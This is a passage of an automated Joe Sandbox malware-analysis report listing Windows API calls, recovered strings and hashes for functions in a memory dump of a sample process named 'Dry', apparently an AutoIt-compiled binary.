                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                    • Opcode ID: 7cbd70df40e574f6662d9713a4f207a304cf1a1df0ec8b5d806ef9341752199f
                                                                                                                                                                                                                                                                                    • Instruction ID: 46e8a9a5fddd1bb6efef745acb8a40ed39497bbc61ccf47c0b15cc3295dfd3c8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cbd70df40e574f6662d9713a4f207a304cf1a1df0ec8b5d806ef9341752199f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32127975A042419FCB14DF15C991A2ABBF5FF88714F04889CF98A9B3A2CB35ED45CB81
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00B71462
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B7149D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B714F0
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B71526
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B715A2
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B7161D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFFD52: _wcslen.LIBCMT ref: 00AFFD5D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B43535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B43547
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                    • Opcode ID: 43af1d0bc654a05e0acb2ff4cb3d12df6f9f46ea4af6ea85b1b1be0c94d06317
                                                                                                                                                                                                                                                                                    • Instruction ID: 6cf663e3aed73135380025098363b4dde1b26ff7088f8aab460ee5fa6019aa40
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43af1d0bc654a05e0acb2ff4cb3d12df6f9f46ea4af6ea85b1b1be0c94d06317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7E18E726083418FC714DF2DC59086AB7E2FF94714B14899CF8AA9B7A1DB30ED45CBA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                    • Opcode ID: d4d47f740ebfaffe765c50e2d49a75018702c64a6b49c090f9aae6710e9d4069
                                                                                                                                                                                                                                                                                    • Instruction ID: ec7dd8b2f330dc4d2182835263e6af1d66928cfd7fffe91c5b433098b96dab10
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4d47f740ebfaffe765c50e2d49a75018702c64a6b49c090f9aae6710e9d4069
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3371DF72F0016A8BCB209E7CCE505BB33E1EF71758B2501A8FC569B694EB39DD4487A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B78DB5
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B78DC9
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B78DEC
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B78E0F
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B78E4D
                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B76691), ref: 00B78EA9
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B78EE2
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B78F25
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B78F5C
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00B78F68
                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B78F78
                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00B76691), ref: 00B78F87
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B78FA4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B78FB0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                    • Opcode ID: bc9c5a8f67058547acd0de3b8bb7369dbe8338da1af9e49834ea04222701594c
                                                                                                                                                                                                                                                                                    • Instruction ID: 9c9162dcedf5f5e7219e81e806aa1c5db70988ea28b0a3d04b2fea420ef4956c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc9c5a8f67058547acd0de3b8bb7369dbe8338da1af9e49834ea04222701594c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5661CF71940215BAEB14DF64CC49BBE7BA8EF08B10F108556F929EA1D1DF74A990CBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00B5493D
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B54948
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B5499F
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B549DD
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00B54A1B
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B54A63
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B54A9E
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B54ACC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                    • Opcode ID: 766ab7cabe24ba724c4a10a589cfdded90ae15732c5c6e575b0613ed8dce06e5
                                                                                                                                                                                                                                                                                    • Instruction ID: 32eaaa624ebe2501f5a4db4bf2408eaec6f998b30a64a4afa4fd4b129d946969
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 766ab7cabe24ba724c4a10a589cfdded90ae15732c5c6e575b0613ed8dce06e5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA7102326082019FC710EF34C981A6BB7E4EF95768F0049ADF89697261EB31DD89CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00B46395
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B463A7
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B463BE
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00B463D3
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00B463D9
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B463E9
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00B463EF
                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B46410
                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B4642A
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B46433
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4649A
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B464D6
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B464DC
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B464E3
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B4653A
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00B46547
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00B4656C
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B46596
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2383821017066db1ca3f72fb3fa4fc26197115f8a357632fa55a232aa1d2cfad
                                                                                                                                                                                                                                                                                    • Instruction ID: ba3a01fe17781e08d6de45be95c76acfd5bfd02dcb07b682e4bef8ed72de2e2b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2383821017066db1ca3f72fb3fa4fc26197115f8a357632fa55a232aa1d2cfad
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8718F31900609AFDB20DFA8CE85BAEBBF5FF48704F100558E586A36A0DB75EE44DB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00B60884
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00B6088F
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00B6089A
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00B608A5
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00B608B0
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00B608BB
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00B608C6
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00B608D1
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00B608DC
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00B608E7
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00B608F2
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00B608FD
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00B60908
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00B60913
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00B6091E
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00B60929
                                                                                                                                                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00B60939
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B6097B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1f9edb23ac719dea84da344ead8bc75218fe8750c3714b0342c3c581819cbccb
                                                                                                                                                                                                                                                                                    • Instruction ID: 98a8c1ace08181aa71a6f4e9e5539a3e2eb058685b4731e2d797aafbde34b0c8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f9edb23ac719dea84da344ead8bc75218fe8750c3714b0342c3c581819cbccb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78415470D483196ADB10DFBA8C8585FBFE9FF04754B50456AE11CE7281DA78D901CF91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B00436
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00BB170C,00000FA0,606BE961,?,?,?,?,00B22733,000000FF), ref: 00B0048C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B22733,000000FF), ref: 00B00497
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B22733,000000FF), ref: 00B004A8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B004BE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B004CC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B004DA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B00505
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B00510
                                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00B00457
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B00413: __onexit.LIBCMT ref: 00B00419
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B00492
                                                                                                                                                                                                                                                                                    • kernel32.dll, xrefs: 00B004A3
                                                                                                                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 00B004D2
                                                                                                                                                                                                                                                                                    • InitializeConditionVariable, xrefs: 00B004B8
                                                                                                                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 00B004C4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                    • Opcode ID: 8dd4eeb90204b0cf1ce5323b578b5c3942ee2c3f49d1d48a7f7e7e3e326e223f
                                                                                                                                                                                                                                                                                    • Instruction ID: 4feb3753ee37b279ff6d042fbf0925661ce47133b6adaa593692cfe71d854f63
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd4eeb90204b0cf1ce5323b578b5c3942ee2c3f49d1d48a7f7e7e3e326e223f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2212932A647046BD7103BA8AC56BA93BF4EF45BE1F4002A5F905A36E0DFB09C408B95
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                    • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                    • Opcode ID: e21effe5376dcec2e288447984ad9d8acbffd09470ef3306277c2e7d8756156a
                                                                                                                                                                                                                                                                                    • Instruction ID: 11001a124aee6d6d00c107156ac9cb88348dfd0ff539c5327be52425c24a4916
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e21effe5376dcec2e288447984ad9d8acbffd09470ef3306277c2e7d8756156a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44E1D432E04516ABCB149FB4C8817EEBBF0FF14B10F1841A9E556E7250DB309F99A7A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00B7DCD0), ref: 00B54F6C
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B54F80
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B54FDE
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B55039
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B55084
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B550EC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFFD52: _wcslen.LIBCMT ref: 00AFFD5D
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00BA7C10,00000061), ref: 00B55188
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                    • Opcode ID: 7efc17e4edd2285912b0f288d2e4331d35789f5db50c2dc54f156a796e5eada2
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a60c1915e831e8fbb78bfe1a2021352bff2787d9e05565cfe54c4dc7e4f71c7
